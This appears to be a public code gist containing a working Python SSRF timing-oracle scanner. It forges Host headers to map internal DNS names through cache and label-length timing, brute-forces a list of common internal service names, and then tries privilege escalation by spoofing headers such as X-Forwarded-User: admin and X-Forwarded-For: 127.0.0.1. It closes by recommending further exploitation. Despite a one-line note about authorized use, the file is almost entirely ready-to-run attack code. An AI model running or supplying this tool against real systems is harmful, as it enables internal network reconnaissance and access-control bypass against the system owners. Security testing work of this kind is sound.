Skip to content

Instantly share code, notes, and snippets.

@ncouture
Created May 14, 2026 17:55
Show Gist options
  • Select an option

  • Save ncouture/6fc1f552fa2bdea0614ada98f42cf16a to your computer and use it in GitHub Desktop.

Select an option

Save ncouture/6fc1f552fa2bdea0614ada98f42cf16a to your computer and use it in GitHub Desktop.
import sys
import time
import asyncio
import argparse
import aiohttp
from typing import Dict, Tuple, Optional, List
# Scoped SSRF timing fuzzer
class ScopedSsrfTimingFuzzer:
    """
    Asynchronous SSRF timing-oracle fuzzer.

    Sends GET requests to a single target URL while varying the ``Host``
    header, and compares response times to look for two side channels:

    - DNS cache side-channel (cache hit vs miss timing)
    - DNS label length validation side-channel

    Use as an async context manager so the underlying HTTP session is opened
    and closed properly::

        async with ScopedSsrfTimingFuzzer(url) as fuzzer:
            await fuzzer.calibrate_baseline()

    Intended for use only against systems you are authorized to test.
    """

    # Default decision thresholds, in seconds. They are environment dependent;
    # override per call through the ``threshold`` parameters.
    LABEL_DELTA_THRESHOLD = 0.025
    CACHE_DELTA_THRESHOLD = 0.028

    def __init__(self, target_url: str, timeout: float = 10.0, verify_ssl: bool = True):
        """
        Args:
            target_url: URL every probe is sent to (trailing "/" is removed).
            timeout: Total per-request timeout in seconds.
            verify_ssl: When False, TLS certificate verification is disabled.
        """
        self.target_url = target_url.rstrip("/")
        self.timeout = aiohttp.ClientTimeout(total=timeout)
        self.verify_ssl = verify_ssl
        # Created in __aenter__, released in __aexit__.
        self.session: Optional[aiohttp.ClientSession] = None
        # Mean latency recorded by calibrate_baseline(); None until it has run.
        self.base_latency: Optional[float] = None

    async def __aenter__(self):
        """Open the HTTP session and return the fuzzer itself."""
        # Only override the connector's TLS setting when verification must be
        # turned off. A literal ``ssl=True`` is not handled uniformly across
        # aiohttp releases (NOTE(review): older releases reportedly treated it
        # as "do not verify"), so the library default is used for verification.
        connector_kwargs = {} if self.verify_ssl else {"ssl": False}
        self.session = aiohttp.ClientSession(
            timeout=self.timeout,
            connector=aiohttp.TCPConnector(**connector_kwargs),
        )
        return self

    async def __aexit__(self, exc_type, exc_val, exc_tb):
        """Close the HTTP session if one was opened."""
        if self.session:
            await self.session.close()
            self.session = None

    @staticmethod
    def _normalize_suffix(scope_suffix: str) -> str:
        """Return the suffix with a single leading dot (empty stays empty)."""
        suffix = scope_suffix.strip()
        if suffix and not suffix.startswith("."):
            suffix = "." + suffix
        return suffix

    @staticmethod
    def _header(headers: Dict[str, str], name: str) -> Optional[str]:
        """Case-insensitive lookup in a plain dict of response headers."""
        wanted = name.lower()
        for key, value in headers.items():
            if key.lower() == wanted:
                return value
        return None

    async def _measure_request(
        self, host: str, extra_headers: Optional[Dict[str, str]] = None
    ) -> Tuple[int, Dict[str, str], float]:
        """
        Send a single probe and return ``(status, headers, duration)``.

        Args:
            host: Value placed in the ``Host`` request header.
            extra_headers: Additional request headers; they override the
                defaults on key collision.

        Returns:
            The HTTP status, the response headers as a plain dict, and the
            elapsed seconds until the response headers were received. On a
            timeout or any other request error the status is ``0`` and the
            headers hold a single ``X-Error`` entry.

        Raises:
            RuntimeError: If called before the session has been opened.
        """
        if self.session is None:
            # Previously this surfaced as a swallowed AttributeError that
            # looked like a failed probe; make the misuse explicit instead.
            raise RuntimeError(
                "HTTP session is not open; use 'async with ScopedSsrfTimingFuzzer(...)'"
            )
        headers = {
            "Host": host,
            "User-Agent": "Mozilla/5.0 (compatible; SSRF-Scanner)",
        }
        if extra_headers:
            headers.update(extra_headers)
        # Start the clock after local setup so only the request is timed.
        start = time.perf_counter()
        try:
            # TLS behavior comes from the connector configured in __aenter__.
            async with self.session.get(
                self.target_url, headers=headers, allow_redirects=False
            ) as resp:
                duration = time.perf_counter() - start
                return resp.status, dict(resp.headers), duration
        except asyncio.TimeoutError:
            return 0, {"X-Error": "Timeout"}, time.perf_counter() - start
        except Exception as e:
            # Best-effort scanner: report the failure as a status-0 result.
            return 0, {"X-Error": str(e)[:100]}, time.perf_counter() - start

    async def calibrate_baseline(self, samples: int = 5) -> float:
        """
        Calibrate baseline latency using an obviously out-of-scope domain.

        Args:
            samples: Number of probes to average; must be at least 1.

        Returns:
            The mean probe duration in seconds (also stored in
            ``self.base_latency``).

        Raises:
            ValueError: If ``samples`` is less than 1.
        """
        if samples < 1:
            raise ValueError("samples must be >= 1")
        print("[*] Calibrating baseline latency...")
        total = 0.0
        for _ in range(samples):
            _, _, dur = await self._measure_request("nonexistent-external-domain-1234567890.com")
            total += dur
        self.base_latency = total / samples
        print(f"[+] Baseline latency: {self.base_latency * 1000:.2f}ms")
        return self.base_latency

    async def analyze_label_length_oracle(
        self, scope_suffix: str = ".internal.corp", threshold: Optional[float] = None
    ) -> bool:
        """
        DNS Label Length Oracle (RFC 1035: max 63 octets per label).

        Probes a 63-character label and a 64-character label under
        ``scope_suffix`` and compares their response times.

        Args:
            scope_suffix: Domain suffix appended to the labels; a leading dot
                is added when missing.
            threshold: Minimum (t63 - t64) difference in seconds counted as a
                signal. Defaults to ``LABEL_DELTA_THRESHOLD``.

        Returns:
            True when both probes got an HTTP response and the 63-character
            probe was slower than the 64-character one by more than the
            threshold; False otherwise.
        """
        suffix = self._normalize_suffix(scope_suffix)
        limit = self.LABEL_DELTA_THRESHOLD if threshold is None else threshold
        valid_label = "a" * 63 + suffix
        invalid_label = "a" * 64 + suffix
        s_valid, _, t_valid = await self._measure_request(valid_label)
        s_invalid, _, t_invalid = await self._measure_request(invalid_label)
        delta = t_valid - t_invalid
        # Status 0 means the probe failed (timeout / transport error); its
        # duration is not a measurement of server-side processing.
        probes_ok = s_valid != 0 and s_invalid != 0
        active_processing = probes_ok and delta > limit
        print(
            f"[Label Oracle] Scope: *{suffix:<35} | "
            f"L63: {t_valid * 1000:6.2f}ms | L64: {t_invalid * 1000:6.2f}ms | "
            f"Δ: {delta * 1000:5.2f}ms | Active: {active_processing}"
        )
        if not probes_ok:
            print(f"[!] Label oracle inconclusive for *{suffix}: a probe failed")
        return active_processing

    async def analyze_dns_cache_oracle(
        self, target_host: str, retries: int = 2, threshold: Optional[float] = None
    ) -> bool:
        """
        DNS Cache Hit Oracle.

        Each round sends two back-to-back probes for ``target_host`` and
        records how much slower the first was than the second.

        Args:
            target_host: Host name placed in the ``Host`` header.
            retries: Number of probe pairs to send; must be at least 1.
            threshold: Minimum mean (t1 - t2) difference in seconds counted as
                a signal. Defaults to ``CACHE_DELTA_THRESHOLD``.

        Returns:
            True when the mean delta over the usable probe pairs exceeds the
            threshold; False otherwise, including when every pair contained a
            failed probe.

        Raises:
            ValueError: If ``retries`` is less than 1.
        """
        if retries < 1:
            raise ValueError("retries must be >= 1")
        limit = self.CACHE_DELTA_THRESHOLD if threshold is None else threshold
        # NOTE(review): every round after the first probes a name that has
        # presumably already been resolved, so averaging over rounds may
        # dilute the first-round signal - confirm the intended statistic.
        deltas = []
        for _ in range(retries):
            # Probe 1
            s1, _, t1 = await self._measure_request(target_host)
            # Probe 2 immediately after
            s2, _, t2 = await self._measure_request(target_host)
            delta = t1 - t2
            print(
                f"[Cache Oracle] {target_host:<45} | P1: {t1 * 1000:6.2f}ms | "
                f"P2: {t2 * 1000:6.2f}ms | Δ: {delta * 1000:5.2f}ms"
            )
            if s1 == 0 or s2 == 0:
                # A timeout or transport error would otherwise show up as a
                # huge delta and be misreported as a cache miss.
                continue
            deltas.append(delta)
        if not deltas:
            print(f"[!] No usable samples for {target_host}; probes failed")
            return False
        avg_delta = sum(deltas) / len(deltas)
        is_likely_internal = avg_delta > limit
        if is_likely_internal:
            print(f"[+] POTENTIAL INTERNAL HOST: {target_host}")
        return is_likely_internal

    async def brute_force_internal_hosts(
        self, wordlist: List[str], scope_suffix: str = ".fictional-enterprise.local"
    ) -> List[str]:
        """
        Run the DNS cache oracle over a list of candidate host names.

        Args:
            wordlist: Candidate names. Entries that do not already end with
                the suffix get it appended (a trailing dot is dropped first).
                Blank entries are skipped.
            scope_suffix: Domain suffix; a leading dot is added when missing.

        Returns:
            The fully qualified candidates the cache oracle flagged, in
            wordlist order.
        """
        suffix = self._normalize_suffix(scope_suffix)
        print(f"\n[*] Starting brute-force on {len(wordlist)} candidates...")
        discovered = []
        for entry in wordlist:
            host = entry.strip()
            if not host:
                # An empty entry would otherwise probe the bare suffix.
                continue
            if not host.endswith(suffix):
                host = host.rstrip(".") + suffix
            if await self.analyze_dns_cache_oracle(host):
                discovered.append(host)
        return discovered

    async def test_privilege_impersonation(self, target_host: str) -> None:
        """
        Probe ``target_host`` with sets of identity-related request headers.

        Sends one request without extra headers and one per header set, and
        prints the status together with the ``X-Privilege-Level`` /
        ``X-Role`` response header (looked up case-insensitively). Nothing is
        returned; results are only printed.
        """
        print(f"\n[*] Testing impersonation vectors on {target_host}")
        vectors = [
            {"X-Forwarded-User": "admin", "X-Forwarded-For": "127.0.0.1"},
            {"X-Forwarded-User": "system-admin", "X-Original-User": "root"},
            {"X-Forwarded-For": "::1", "X-Real-IP": "10.0.0.1"},
            {"X-Forwarded-User": "administrator", "X-Authenticated-User": "admin"},
        ]
        base_status, base_headers, _ = await self._measure_request(target_host)
        base_priv = self._header(base_headers, "X-Privilege-Level")
        if base_priv is None:
            base_priv = "None"
        print(f" Base access → {base_status} | {base_priv}")
        for headers in vectors:
            status, resp_headers, _ = await self._measure_request(target_host, headers)
            priv = (
                self._header(resp_headers, "X-Privilege-Level")
                or self._header(resp_headers, "X-Role")
                or "None"
            )
            print(f" + Headers {list(headers.keys())} → {status} | Privilege: {priv}")
def _load_wordlist(path: str) -> List[str]:
    """Read candidate names from *path*, skipping blank and '#' comment lines."""
    with open(path, encoding="utf-8") as handle:
        # Strip first so indented comments and whitespace-only lines are dropped.
        stripped = (line.strip() for line in handle)
        return [entry for entry in stripped if entry and not entry.startswith("#")]


async def main() -> None:
    """
    Command-line entry point.

    Parses the arguments, then runs three phases against the target:
    label-length scope detection (with a negative control), DNS cache
    oracle brute force over a wordlist, and header impersonation tests
    on up to three of the discovered hosts.
    """
    parser = argparse.ArgumentParser(description="Scoped SSRF Timing Oracle Scanner")
    parser.add_argument("target", help="Target URL (e.g. http://proxy.internal:8080/endpoint)")
    parser.add_argument("--wordlist", help="Path to subdomain wordlist", default=None)
    parser.add_argument("--scope", default=".internal.corp", help="Internal domain suffix")
    parser.add_argument("--no-ssl-verify", action="store_true", help="Disable SSL verification")
    args = parser.parse_args()
    print("[*] Real-World Scoped SSRF Timing Oracle Framework")
    print(f"[+] Target: {args.target}\n")
    async with ScopedSsrfTimingFuzzer(args.target, verify_ssl=not args.no_ssl_verify) as fuzzer:
        await fuzzer.calibrate_baseline()
        print("\n" + "=" * 80)
        print("PHASE 1: SCOPE DETECTION (Label Length Oracle)")
        print("=" * 80)
        await fuzzer.analyze_label_length_oracle(args.scope)
        await fuzzer.analyze_label_length_oracle(".external-attackers.com")  # negative control
        print("\n" + "=" * 80)
        print("PHASE 2: INTERNAL HOST DISCOVERY (DNS Cache Oracle)")
        print("=" * 80)
        # Default wordlist for demonstration / common internal names
        default_candidates = [
            "admin",
            "api",
            "internal",
            "staging",
            "dev",
            "prod",
            "core",
            "auth",
            "login",
            "db",
            "database",
            "ldap",
            "jenkins",
            "gitlab",
            "confluence",
            "jira",
            "grafana",
            "prometheus",
            "kubernetes",
            "etcd",
        ]
        wordlist = default_candidates
        if args.wordlist:
            try:
                wordlist = _load_wordlist(args.wordlist)
            except (OSError, UnicodeError) as e:
                # Unreadable or undecodable file: keep the built-in defaults.
                print(f"[-] Failed to load wordlist: {e}")
            else:
                print(f"[+] Loaded {len(wordlist)} entries from wordlist")
        discovered = await fuzzer.brute_force_internal_hosts(wordlist, args.scope)
        print("\n" + "=" * 80)
        print("PHASE 3: PRIVILEGE ESCALATION TESTING")
        print("=" * 80)
        for host in discovered[:3]:  # Test top discovered hosts
            await fuzzer.test_privilege_impersonation(host)
        if discovered:
            print(f"\n[+] Discovered internal hosts: {discovered}")
            print("[!] Manual verification and further exploitation recommended.")
if __name__ == "__main__":
    # Executed as a script: build the top-level coroutine and drive it to
    # completion on a fresh event loop.
    scan = main()
    asyncio.run(scan)
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment